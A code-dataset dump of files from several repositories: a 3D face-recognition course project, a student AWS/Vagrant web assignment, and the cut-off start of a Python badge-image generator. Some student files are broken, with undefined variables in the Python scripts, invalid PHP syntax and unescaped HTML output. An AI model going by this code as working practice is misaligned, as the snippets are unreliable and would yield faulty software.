\"Nothing to do\"\n return\n\n # Calculate rows and columns\n columns = math.ceil(math.sqrt(len(faces)))\n rows = ((len(faces) - 1) / 
columns) + 1;\n figure = pyplot.figure()\n figure.subplots_adjust(top=0.85)\n index = 1\n\n for (file, person_id, face) in faces:\n # Advance to next plot\n subplot = figure.add_subplot(columns, rows, index, xticks=[], yticks=[])\n index = index + 1\n\n # Plot face\n func(subplot, file, person_id, face, index)\n subplot.title.set_text(person_id)\n subplot.title.set_fontsize(10)\n subplot.xaxis.set_visible(False)\n subplot.yaxis.set_visible(False)\n\n # Save figure\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\ndef generate_feature_map(faces, output_file):\n def _func(subplot, file, person_id, face, index):\n subplot.imshow(face.features[1].reshape(face.features[2]))\n\n generate_base_map(faces, _func, output_file)\n\ndef generate_depth_map(faces, output_file, key_points=False):\n def _func(subplot, file, person_id, face, index):\n subplot.imshow(face.Z)\n\n if key_points == True:\n for name, point in face.key_points.iteritems():\n x, y = point\n subplot.plot(x, y, 'x', color='k')\n\n generate_base_map(faces, _func, output_file)\n\ndef generate_similarity_matrix(matrix, faces, output_file):\n methods, rows, cols = matrix.shape\n output = []\n\n # Iterate each method\n for i in range(methods):\n if cols > 0:\n table = []\n table.append(\"<h1>Method %d</h1><table><tr><td></td>%s</tr>\" % (i, \"\\n\".join([ \"<td>%s</td>\" % faces[j][1] for j in range(cols) ])))\n\n for j in range(rows):\n table.append(\"<tr><td>%s</td>%s</tr>\" % (faces[j][1], \"\\n\".join([ \"<td>%s</td>\" % ((\"%.2f\" % matrix[(i, j, k)]) if not numpy.isnan(matrix[(i, j, k)]) else \"—\") for k in range(cols) ])))\n\n table.append(\"</table>\")\n output.append(\"\\n\".join(table))\n\n # Write table to file\n with open(output_file, \"w\") as f:\n f.write(\"\"\"\n <html>\n <head>\n <title>Similarity Matrix</title>\n </head>\n <body>\n %s\n </body>\n </html>\n \"\"\" % \"\\n\".join(output))\n\ndef generate_roc_curve(rocs, output_file):\n grey = (0.7, 0.7, 0.7, 0.7)\n figure = pyplot.figure()\n titles = [\"Euclidean\", \"City Block\", \"Correlation\"]\n legends = []\n plots = []\n index = 0\n\n # Draw ROC line\n subplot = pyplot.subplot(1, 1, 1)\n subplot.plot([0, 1], [1, 0], color=grey)\n\n # Plot each line\n for roc, eer in rocs:\n plots.extend(subplot.plot(roc[0], roc[1]))\n subplot.plot(eer, 1 - eer, 'x', color='r')\n\n # Include EER in legend\n legends.append(\"%s (EER=%.2f%%)\" % (titles[index], eer * 100))\n index = index + 1\n\n # Axis and legend\n subplot.set_xlabel('False positives rate')\n subplot.set_ylabel('True positives rate')\n subplot.legend(plots, legends, loc=4)\n\n # Save figure\n figure.savefig(output_file, format='pdf', dpi=600, orientation='landscape', bbox_inches=\"tight\")\n\nclass GeneratorLen(object):\n def __init__(self, gen, length):\n self.gen = gen\n self.length = length\n\n def __len__(self): \n return self.length\n\n def __iter__(self):\n return self.gen\n\n"
},
{
"alpha_fraction": 0.5931512713432312,
"alphanum_fraction": 0.5968202352523804,
"avg_line_length": 31.289474487304688,
"blob_id": "258337dcdc667d43a6c7acd793b63bc647c96877",
"content_id": "4f7f4683d346cdcbc80e9614915bd69539993b3a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2453,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 76,
"path": "/face3d/database.py",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "\"\"\"\nCopyright (c) 2012 Bas Stottelaar, Jeroen Senden\nSee the file LICENSE for copying permission.\n\"\"\"\n\nfrom utils import GeneratorLen\n\nimport sqlite3\nimport cPickle\nimport cStringIO\nimport gzip\nimport threading\n\nclass Database(object):\n\n def __init__(self, path):\n self.lock = threading.Lock()\n self.connection = sqlite3.connect(path, check_same_thread=False)\n self.connection.execute(\"CREATE TABLE IF NOT EXISTS faces (filename TEXT, person_id TEXT, data BLOB);\")\n\n def flush(self):\n with self.lock:\n self.connection.execute(\"DELETE FROM faces;\")\n self.connection.commit()\n\n def exists(self, filename):\n with self.lock:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT filename FROM faces WHERE filename = ? LIMIT 1\", (filename, ))\n \n for row in cursor:\n return True\n\n return False\n\n def load(self, filename):\n with self.lock:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT filename, data FROM faces WHERE filename = ? LIMIT 1\", (filename, ))\n\n for filename, data in cursor:\n string_file = cStringIO.StringIO(data)\n try:\n return cPickle.load(gzip.GzipFile(fileobj=string_file, mode='rb'))\n except:\n return None\n\n def save(self, filename, person_id, data):\n # Serialize and compress data\n string_file = cStringIO.StringIO()\n\n with gzip.GzipFile(fileobj=string_file, mode='wb') as gzip_file:\n gzip_file.write(cPickle.dumps(data))\n\n # Create SQLite compatible data\n data = sqlite3.Binary(string_file.getvalue())\n\n # Insert data and commit\n with self.lock:\n self.connection.execute(\"INSERT INTO faces(filename, person_id, data) VALUES (?, ?, ?)\", (filename, person_id, data))\n self.connection.commit()\n \n def iterator(self):\n with self.lock:\n cursor = self.connection.cursor()\n cursor.execute(\"SELECT filename, person_id FROM faces ORDER BY person_id ASC\")\n rows = [ (filename, person_id) for filename, person_id, in cursor ]\n count = len(rows)\n\n def _generator():\n for (filename, person_id) in rows:\n f = self.load(filename)\n if f:\n yield (filename, person_id, f)\n\n return GeneratorLen(_generator(), count)"
},
{
"alpha_fraction": 0.7445651888847351,
"alphanum_fraction": 0.7618147730827332,
"avg_line_length": 61.25,
"blob_id": "7cf0d3239bf20240cde369df75ca76d97fa7dbe5",
"content_id": "94e7b2c9e762608b9cde3a23a965e4e0b5f5a338",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4232,
"license_type": "permissive",
"max_line_length": 511,
"num_lines": 68,
"path": "/README.md",
"repo_name": "Sewasale/Course-Face3D",
"src_encoding": "UTF-8",
"text": "# Face3D\nPrototype system for 3D Face Recognition built by Bas Stottelaar and Jeroen Senden for the course Introduction to Biometrics. Written in Python, applicable to the FRGC 3D data set.\n\n## Features\nThe following algorithms have been implemented:\n\n### Normalization\n* Smoothing\n* Interpolation\n* Cropping\n* Zooming\n* Key point extraction\n* Rotation\n\n### Feature extraction\nHistogram based, as proposed by Zhou et al. See http://www.3dface.org/files/papers/zhou-EG08-histogram-face-rec.pdf for more information.\n\n### Distance Metrics\n* Method 0: Euclidean Distance with threshold 0.9\n* Method 1: City Block Distance with threshold 0.9\n* Method 2: Sample Correlation Coefficient with threshold 0.9\n\n## Installation\nThe following dependencies are expected to be on your system\n\n* Python 2.7 (version 2.6 should work)\n* NumPy 1.6\n* SciPy 0.11\n* Matplotlib 1.2\n* SciKit-learn 0.12\n\nIn case of missing dependencies, they can be installed via the Python Packet Manager, via the command `pip install <name>`. \n\n## Quick Start\nA few examples to get started:\n\n* `python Face3D.py --enroll /path/to/abs/files --auto-id` — Enrolls all files in the folder and determines person identification based on filename.\n* `python Face3D.py --authenticate /path/to/file.abs` — Authenticate given file against the enrolled images. Will output the matches with scores.\n* `python Face3D.py --reevaluate --parameters N=48,K=12` — Reevaluate the data set with the given parameters. Does not save data, but you could visualize something with this data.\n\n## Usage\nFace3D is a commandline only application. Start a terminal and navigate to this directory where Face3D is extracted. Start the application with the command `python Face3D.py`.\n\n### General\n* `python Face3D.py --help` — Show help.\n* `python Face3D.py --parameters` — Comma seperated key-value parameters for the algorithms. Defaults (and only parameters supported) are `N=67,K=12`.\n* `python Face3D.py --database` — Specify the Face3D Database to work on. Default is `database.db`. You need to specify this option each time if you would like to use another database for operations below.\n\n### Face management\n* `python Face3D.py --enroll <file | directory> --person-id <id>|--auto-id` — Enroll a single file or a complete directory to the Face3D Database. Multiple threads will be spawned in case of multiple files. You have to specify a person ID. In case of auto ID, it will be derrived from the `*.abs` filename (xxxxxd123.abs). This process can take up to 15 minutes for 350+ faces on a Intel Core i7. If a face has already been enrolled, it will notify the user. Simply delete the database file to start over.\n* `python Face3D.py --authenticate <file>` — Match a given face to a face in the database.\n* `python Face3D.py --reevaluate` — Reevaluate the faces with another set of parameters. Works only for feature extraction and other calculations after feature extraction. This comes in handy when evaluating different parameters.\n\n### Visualization & Statistics\n* `python Face3D.py --depth-map <output.pdf> [--with-key-points]` — Write a 3D depth map of enrolled faces to a PDF file, with or without key points.\n* `python Face3D.py --feature-map <output.pdf>` — Write a feature map of enrolled faces to a PDF file. 
\n* `python Face3D.py --similarity-matrix <output.html>` — Write a similarity matrix to a HTML file.\n* `python Face3D.py --roc-curve <output.pdf>` — Write a ROC curve to a HTML file.\n\n## Source code\nThe main application logic is defined in `Face3D.py`. The rest of the code is stored in the folder `face3d/`.\n\nOne important file is `face3d/algorithms.py`. Here are all the algorithms programmed that are used for smoothing, interpolating, finding key points, cropping, feature extracting. Dependencies are `face3d/absfile.py` and `face3d/face.py`. The first reads `*.abs` files into memory and the second one is a wrapper for the data and handles views and compression. \n\nOn of the two files left is `face3d/database.py`, a wrapper for an SQLite3 database file. It reads and writes faces and features. Last but not least is `face3d/utils.py` as a place for common used methods.\n\n## Licence\nSee the LICENCE file."
}
] | 9 |
genericprogrammerguy/COSC349_Assignment_2 | https://github.com/genericprogrammerguy/COSC349_Assignment_2 | 16327cb7ba5f39b186e95cc733afdff5a8cc44d0 | a3ff09b57ecd64d6408077ae86bf168d02ca4c37 | ab557d94bc8531a49dfaea7dec65cdbc5dd43230 | refs/heads/master | 2022-03-03T12:12:34.721494 | 2019-10-07T10:16:19 | 2019-10-07T10:16:19 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6716417670249939,
"alphanum_fraction": 0.6865671873092651,
"avg_line_length": 15.75,
"blob_id": "081b9c87f99540f9a8922de773c096d6c45b489f",
"content_id": "ee0921b11e5cba343922d173ea9f9891328be9fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 67,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 4,
"path": "/make_bucket.sh",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nmkdir ~/.aws\ncp -f credentials ~/.aws\npython3 paper.py\n"
},
{
"alpha_fraction": 0.6358381509780884,
"alphanum_fraction": 0.6647399067878723,
"avg_line_length": 14.454545021057129,
"blob_id": "9767a00cac02e524f0106636a7190e13dc1413ce",
"content_id": "5faa2c88ca7b4e8e820010ef62b4d7b7135c8593",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 11,
"path": "/paper.py",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "import boto3\n\ns3 = boto3.client('s3')\n\npaper = s3.get_object(Bucket='orsum', Key='richard_seddon.txt')\n\nresponse = obj.get()\n\ndata = response['Body'].read()\n\nprint(data)\n\n\n\n"
},
{
"alpha_fraction": 0.6085653305053711,
"alphanum_fraction": 0.6376873850822449,
"avg_line_length": 22.816326141357422,
"blob_id": "8427c60915a65f72ab762130161dba690b45a68a",
"content_id": "e5876f4787118d8c88fa0f6dc41cfdf2e01ac9ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2335,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 98,
"path": "/www/indexSent.php",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">\n<html>\n<head><title>Database</title>\n<style>\nth { text-align: left; }\ntable, th, td {\nborder: 4px solid grey;\nborder-collapse: collapse;\n}\nth, td {\npadding: 0.2em;\ntext-align: right;\n}\n</style>\n\n\n</head>\n\n<body>\n<h1>Pass/Fail By Subject 2009-2011 at the University of Otago </h1>\n<!--- <b>Actual Data from OIA:<b><a href=\"https://fyi.org.nz/request/grade_breakdown_by_course_subjec_2\"> Click Here </a> -->\n<table>\n<input type=\"text\" id=\"searchTable\" onkeyup=\"search()\" placeholder=\"search\">\n\n<table border=\"1px solid black\" id=\"database2009\">\n<tr>\n<th>SUBJECT</th>\n<th>2009 PASS(%)</th>\n<th>2009 FAIL(%)</th>\n<th>2010 PASS(%)</th>\n<th>2010 FAIL(%)</th>\n<th>2011 PASS(%)</th>\n<th>2011 FAIL(%)</th>\n<tr>\n\n<?php include \"../inc/dbinfo.inc\"; ?>\n<?php\n\n/* Connect to MySQL and select the database. */\n$connection = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD);\n\n\nif (mysqli_connect_errno()) echo \"Failed to connect to MySQL: \" . mysqli_connect_error();\n\n/* $database = mysqli_select_db($connection, DB_DATABASE);*/\n\n/* Ensure that the EMPLOYEES table exists. */\n/*VerifyPapersTable($connection, DB_DATABASE);\n\n$pdo = new PDO(DB_SERVER, DB_USERNAME, DB_PASSWORD);*/\n$result = mysqli_query($connection, \"SELECT * FROM database2009.papers\");\nwhile($row = mysqli_fetch_row($result)){\necho \"<tr>\";\necho \"<td>\",$row[0], \"</td>\",\n\"<td>\",$row[1], \"</td>\",\n\"<td>\",$row[2], \"</td>\",\n\"<td>\",$row[3], \"</td>\",\n\"<td>\",$row[4], \"</td>\", \n\"<td>\",$row[5], \"</td>\", \n\"<td>\",$row[6], \"</td>\", \necho \"</tr>\";\n};\n\n?>\n<?php\n</table>\n\n<script>\nfunction search() {\nvar input, filter, table, tr, td, i, txtValue, url;\ninput = document.getElementById(\"database2009\");\nfilter = input.value.toUpperCase();\n\ntable = document.getElementById(\"search\");\ntr = table.getElementsByTagName(\"tr\");\n\n// Loop through all table rows, and hide those who don't match the search query\nfor (i = 0; i < tr.length; i++) {\ntd = tr[i].getElementsByTagName(\"td\")[0];\nif (td) {\ntxtValue = td.textContent || td.innerText;\nif (txtValue.toUpperCase().indexOf(filter) > -1) {\ntr[i].style.display = \"\";\n} else {\ntr[i].style.display = \"none\";\n}\n} \n}\n}\n</script>\n?> \n<p>(i) Excludes subject/level combinations with fewer than 10 enrolments.</p/n>\n<p>(ii) Excludes papers at 400-level and above.</p>\n\n<h3>Notes:</h3> \n\n</body>\n</html>\n\n"
},
{
"alpha_fraction": 0.6069958806037903,
"alphanum_fraction": 0.6373456716537476,
"avg_line_length": 28.014925003051758,
"blob_id": "02a84966929a44cadb2d6714feb03996e4426d0e",
"content_id": "b5bd7bde8d8af9732068a583591ad2e496ba29d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": true,
"language": "Ruby",
"length_bytes": 3888,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 134,
"path": "/Vagrantfile",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "# -*- mode: ruby -*-\n# vi: set ft=ruby :\n\n# For a complete reference, please see the online documentation at\n# https://docs.vagrantup.com.\n\n# Every Vagrant development environment requires a box. You can search for\n# boxes at https://vagrantcloud.com/search.\n\nVagrant.configure(\"2\") do |config|\n\n config.vm.box = \"dummy\"\n\n config.vm.define 'web' do |web|\n web.vm.provider :aws do |aws, override|\n aws.tags = {'Name' => \"web\"}\n\n aws.access_key_id=\"KEY ID\"\n aws.secret_access_key=\"ACCESS KEY\"\n aws.session_token=\"SESSION KEY\"\n\n aws.monitoring = false\n aws.use_iam_profile = false\n\n # SSH Keypair\n aws.keypair_name = \"Assignment_2\"\n override.ssh.private_key_path = \"~/.ssh/Assignment_2.pem\"\n\n # Specify region,AMI ID and security group\n aws.region = \"us-east-1\"\n\n # Force synchronisation of files to the vm via rsync\n override.nfs.functional = false\n override.vm.allowed_synced_folder_types = :rsync\n\n\n # Amazon EC2 instance type configuration \n aws.instance_type = \"t2.micro\"\n aws.security_groups = [\"sg-047901eadd5c64f03\"]\n aws.availability_zone = \"us-east-1e\"\n aws.subnet_id = \"subnet-446d0b7a\"\n aws.ami = \"ami-04763b3055de4860b\"\n\n override.ssh.username = \"ubuntu\"\n end\n \n web.vm.provision \"shell\", inline: <<-SHELL\n apt-get update\n apt-get install -y apache2 php libapache2-mod-php php-mysql\n cp -f /vagrant/www/index.php /var/www/html\n a2ensite www/index.php\n a2dissite 000-default\n service apache2 reload\n SHELL\n end\n \n config.vm.define 'database' do |database|\n database.vm.provider :aws do |aws, override|\n aws.tags = {'Name' => \"database\"}\n\n aws.access_key_id=\"KEY ID\"\n aws.secret_access_key=\"ACCESS KEY\"\n aws.session_token=\"SESSION KEY\"\n \n aws.monitoring = false\n aws.use_iam_profile = false\n\n # SSH Keypair\n aws.keypair_name = \"Assignment_2\"\n override.ssh.private_key_path = \"~/.ssh/Assignment_2.pem\"\n\n # Specify region,AMI ID and security group\n aws.region = \"us-east-1\"\n\n # Force synchronisation of files to the vm via rsync\n override.nfs.functional = false\n override.vm.allowed_synced_folder_types = :rsync\n\n\n # Amazon EC2 instance type configuration \n aws.instance_type = \"t2.micro\"\n aws.security_groups = [\"sg-047901eadd5c64f03\"]\n aws.availability_zone = \"us-east-1e\"\n aws.subnet_id = \"subnet-446d0b7a\"\n aws.ami = \"ami-04763b3055de4860b\"\n\n override.ssh.username = \"ubuntu\"\n end\n \n database.vm.provision \"shell\", inline: <<-SHELL\n SHELL\n end\n\n config.vm.define 'paper' do |paper|\n paper.vm.provider :aws do |aws, override|\n aws.tags = {'Name' => \"paper\"}\n \n aws.access_key_id=\"KEY ID\"\n aws.secret_access_key=\"ACCESS KEY\"\n aws.session_token=\"SESSION KEY\"\n \n aws.monitoring = false\n aws.use_iam_profile = false\n\n # SSH Keypair\n aws.keypair_name = \"Assignment_2\"\n override.ssh.private_key_path = \"~/.ssh/Assignment_2.pem\"\n\n # Specify region,AMI ID and security group\n aws.region = \"us-east-1\"\n\n # Force synchronisation of files to the vm via rsync\n override.nfs.functional = false\n override.vm.allowed_synced_folder_types = :rsync\n\n # Amazon EC2 instance type configuration \n aws.instance_type = \"t2.micro\"\n aws.security_groups = [\"sg-047901eadd5c64f03\"]\n aws.availability_zone = \"us-east-1e\"\n aws.subnet_id = \"subnet-446d0b7a\"\n aws.ami = \"ami-04763b3055de4860b\"\n\n override.ssh.username = \"ubuntu\"\n end\n \n paper.vm.provision \"shell\", inline: <<-SHELL\n #apt-get update\n #apt install -y python3-pip awscli\n #export 
LC_ALL=\"en_US.UTF-8\"\n #pip3 install boto3\n #su -c \"echo 'runnning shell script make_buket'; ./make_bucket.sh\" ubuntu\n SHELL\n end\nend\n"
},
{
"alpha_fraction": 0.64673912525177,
"alphanum_fraction": 0.6739130616188049,
"avg_line_length": 21.75,
"blob_id": "93fbb5ee7bd0de7ab5bdb5c75d4dc1a3f2ac5e55",
"content_id": "bfe8249dcdc92598b335b54136368192d571f6b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 8,
"path": "/updated-paper.py",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "import urllib3.request\n\nhttp = urllib3.PoolManager()\n\nr = http.request('GET', 'https://orsum.s3.amazonaws.com/database-2.csv')\n\nwith open('database-2.csv', 'w') as w:\n f.write(r)\n\n\n"
},
{
"alpha_fraction": 0.5381041169166565,
"alphanum_fraction": 0.5566914677619934,
"avg_line_length": 24.619047164916992,
"blob_id": "c83ee91d450d991a23b1d2c7a8856ba0165399a3",
"content_id": "70ed7a8b0cd56f01d813b888c0cbc71c2dab0b1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1084,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 42,
"path": "/www/index.php",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML//EN\">\n<html>\n <head><title>Database</title>\n <style>\n th { text-align: left; }\n table, th, td {\n border: 4px solid grey;\n border-collapse: collapse;\n }\n th, td {\n padding: 0.2em;\n text-align: right;\n }\n </style>\n \n \n </head>\n\n <body>\n <h1>Pass/Fail By Subject 2009-2011 at the University of Otago </h1>\n <?php\n $excelFile = realpath('database-2.xls');\n $excelDir = dirname($excelFile);\n $connection = odbc_connect(\"Driver={Microsoft Excel Driver (*.xls)};DriverId=790;Dbq=$excelFile;DefaultDir=$excelDir\" , '', '');\n\n <!-- add more fields -->\n $sqlQuery = \"SELECT PaperSubject FROM Main\";\n\n $results = odbc_exec($connectionString, $sqlQuery);\n\n <!-- add more outputs -->\n while(odbc_fetch_row($results)){ $output1 = odbc_result($results, 1); }\n\n <!-- do stuff with the outputs -->\n print(“Excel Data”); print(\"$output1 \"); print(“”);\n\n odbc_close($connectionString);\n\n ?>\n\n </body>\n</html>\n"
},
{
"alpha_fraction": 0.5408163070678711,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 23.5,
"blob_id": "3cb21510c41df3d54279cec3f3748e15c43069b9",
"content_id": "d2faceb146edf4e46f67837b9bfa82ff2183a885",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 588,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 24,
"path": "/setup-2.sql",
"repo_name": "genericprogrammerguy/COSC349_Assignment_2",
"src_encoding": "UTF-8",
"text": "CREATE DATABASE database2012;\nUSE database2012;\n\n\nCREATE TABLE new_papers (\n subject varchar(40) NOT NULL,\n y2012 varchar(3) NOT NULL,\n y2013 varchar(3) NOT NULL,\n y2014 varchar(3) NOT NULL,\n y2015 varchar(3) NOT NULL,\n y2016 varchar(3) NOT NULL,\n y2017 varchar(3) NOT NULL,\n y2018 varchar(3) NOT NULL,\n\n PRIMARY KEY (subject)\n\n);\n\nLOAD DATA LOCAL INFILE '~/349/COSC_Assignment_2/database.csv'\nINTO TABLE new_papers\nFIELDS TERMINATED BY ','\nLINES TERMINATED BY '\\n'\nIGNORE 1 ROWS\n(subject, y2012,y2013,y2014,y2015,y2016,y2017,y2018);\n"
}
] | 7 |
mattpearson/GeminiBook | https://github.com/mattpearson/GeminiBook | a1f6d537ee67139d3b14c0fcd84d24ae9e37e42a | bba80a5b4407560a9d8a1c313e0a2b550664784e | 8c2b7371eaedf523d7993ce805f255403fb4ae9d | refs/heads/master | 2020-12-02T09:55:11.056180 | 2017-07-09T04:17:27 | 2017-07-09T04:17:27 | 96,660,502 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8444444537162781,
"alphanum_fraction": 0.8444444537162781,
"avg_line_length": 44,
"blob_id": "43fe0ec08760c2f619f26475c8ba9be04fba6239",
"content_id": "47a07b07a51cb8a0f21f70fc5aa021ff8f86f348",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 90,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 2,
"path": "/README.md",
"repo_name": "mattpearson/GeminiBook",
"src_encoding": "UTF-8",
"text": "# GeminiBook\nGemini Exchange marketdata depth of book creation using websockets in python\n"
},
{
"alpha_fraction": 0.4737074673175812,
"alphanum_fraction": 0.4790101647377014,
"avg_line_length": 22.57291603088379,
"blob_id": "ec768e2f0ba97f381d475a8333cda1314f610c46",
"content_id": "4ded7e391b9177e510a99a838eae38f9a7a8e054",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2263,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 96,
"path": "/gemini.py",
"repo_name": "mattpearson/GeminiBook",
"src_encoding": "UTF-8",
"text": "# vim:sw=4:nu:expandtab:tabstop=4:ai\n\nimport websocket\nimport thread\nimport time\nimport json\n\nclass level():\n def __init__( self, price, qty ):\n self.price = price\n self.qty = qty\n pass\n def set( price, qty ):\n self.price = price\n self.qty = qty\n\nclass GeminiBook:\n def __init__(self):\n self.bids = {}\n self.offers = {}\n\n\ndef printBook( inside = True ):\n if( inside ):\n bestbid = max( gemini.bids )\n bestask = min( gemini.offers )\n\n str = ''\n\n bb = gemini.bids[ bestbid ]\n if( bb ):\n str = '%.2f (%.2f) || ' % ( bb.price, bb.qty )\n\n ba = gemini.offers[ bestask ]\n if( ba ):\n str = str + '%.2f (%.2f)' % ( ba.price, ba.qty )\n\n print str\n\n else:\n print 'full depth printing not yet supported.'\n pass\n\n\ndef on_message(ws, message):\n #print('Received: ', message)\n\n j = json.loads( message )\n\n events = j['events']\n for r in range( len( events ) ):\n e = events[r]\n\n try:\n side = e['side']\n price = float(e['price'])\n qty = float(e['remaining'])\n if( side == u'ask'):\n if( qty == 0 ):\n gemini.offers.pop( price, None )\n else:\n gemini.offers[ price ] = level( price, qty )\n if( side == u'bid'):\n if( qty == 0 ):\n gemini.bids.pop( price, None )\n else:\n gemini.bids[ price ] = level( price, qty )\n except Exception, err:\n print 'Error: %s %s' % ( err, e )\n printBook()\n\ndef on_error(ws, error):\n print(error)\n\ndef on_close(ws):\n print(\"### closed ###\")\n\ndef on_open(ws):\n def run(*args):\n while( True ):\n time.sleep(100)\n ws.close()\n print(\"thread terminating...\")\n thread.start_new_thread(run, ())\n\n\nif __name__ == \"__main__\":\n gemini = GeminiBook()\n\n websocket.enableTrace(True)\n ws = websocket.WebSocketApp(\"wss://api.gemini.com/v1/marketdata/ethusd\",\n on_message = on_message,\n on_error = on_error,\n on_close = on_close)\n ws.on_open = on_open\n ws.run_forever()\n"
}
] | 2 |
1337GAK/Conference-Badge-Creator | https://github.com/1337GAK/Conference-Badge-Creator | 0c9786996881353442fb6498a1dbdad3dbfb737b | bf67aa6d9ca833d71c226176099e8a8ae03d9e12 | 12d475828b44fc198213565f4437137e1d6c3c02 | refs/heads/master | 2021-05-04T07:31:26.254750 | 2017-10-31T21:00:06 | 2017-10-31T21:00:06 | 70,632,957 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5319364070892334,
"alphanum_fraction": 0.5523121356964111,
"avg_line_length": 40.43712615966797,
"blob_id": "797be14caf684dd937bdcf12a709c06200a233fe",
"content_id": "f01070ac1be3963adf380d60f210d118ad0c7962",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6996,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 167,
"path": "/dictTextToImage.py",
"repo_name": "1337GAK/Conference-Badge-Creator",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom excelParse import *\n\nfrom PIL import ImageFont\nfrom PIL import Image\nfrom PIL import ImageDraw\n\nimport os\nimport os.path\nfrom os import mkdir\n\nImage.init()\nImage.SAVE.keys()\n\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\n\nMAIN_FONT = \"C:/Windows/Fonts/GOTHICB.ttf\"\nMAIN_FONT_SIZE = 85\nOCCUPATIONS_FONT = \"C:/Windows/Fonts/Cocomat Light-trial.ttf\"\nOCCUPATIONS_FONT_SIZE = 0.75 * float(MAIN_FONT_SIZE)\nUNIVERSITIES_FONT = \"C:/Windows/Fonts/GOTHICI.TTF\"\nUNIVERSITIES_FONT_SIZE = OCCUPATIONS_FONT_SIZE\n\nEXCESS_FONT_SIZE = 65\n\ndef initialize_occupation_directories(occupations, size):\n read = False\n for i in range(size):\n if not read:\n if not os.path.exists(\"Badges Wave 2016\"):\n mkdir(\"Badges Wave 2016\")\n os.chdir(\"Badges Wave 2016\")\n read = True\n if group:\n for j in range(0, len(occupations)):\n if not os.path.exists(occupations[j]):\n mkdir(occupations[j])\n else:\n if not os.path.exists(\"Occupations\"):\n mkdir(\"Occupations\")\n\ndef draw_data_to_img(img, name, surname, occupation, university):\n # Values and offsets modified through trial and error\n\n ######################### HACKS TO FIT TEXT PROPERLY TO TEMPLATE ####################################\n\n # pad for proper styling on template\n name_xpad = 63\n name_ypad = 750\n\n surname_xpad = name_xpad\n surname_ypad = name_ypad + 85\n\n occupation_xpad = name_xpad\n occupation_ypad = 1010\n\n university_xpad = name_xpad\n university_ypad = 1110\n \n ############# Adjust sizes so that text doesnt spill from black box\n name_font = ImageFont.truetype(MAIN_FONT, MAIN_FONT_SIZE)\n if len(name) > 10:\n name_font = ImageFont.truetype(MAIN_FONT, EXCESS_FONT_SIZE)\n name_ypad += 10\n\n surname_font = ImageFont.truetype(MAIN_FONT, MAIN_FONT_SIZE)\n if len(surname) > 10:\n surname_font = ImageFont.truetype(MAIN_FONT, EXCESS_FONT_SIZE)\n surname_ypad += 20\n\n occupation_font = ImageFont.truetype(OCCUPATIONS_FONT,int(OCCUPATIONS_FONT_SIZE))\n if len(occupation) > 25:\n OCCUPATIONS_FONT_SIZE = 0.63 * float(OCCUPATIONS_FONT_SIZE)\n occupation_xpad = 55\n occupation_ypad += 5\n elif len(occupation) > 20:\n OCCUPATIONS_FONT_SIZE = 0.76 * float(OCCUPATIONS_FONT_SIZE)\n\n if university!='0':\n university_nl = university\n uni_words = university.split()\n if university == \"THE AMERICAN COLLEGE OF THESSALONIKI\":\n university_nl = \"THE AMERICAN\\nCOLLEGE OF\\nTHESSALONIKI\"\n elif len(university)>50:\n university_nl = u\"ΕΘΝΙΚΟ ΚΑΙ\\nΚΑΠΟΔΙΣΤΡΙΑΚΟ ΠΑΝΕΠΙΣΤΗΜΙΟ\\nΑΘΗΝΩΝ/ΑΡΙΣΤΟΤΕΛΕΙΟ\\nΠΑΝΕΠΙΣΤΗΜΙΟ ΘΕΣΣΑΛΟΝΙΚΗΣ\"\n size_uni_font = 0.70 * float(size_uni_font)\n elif len(university) > 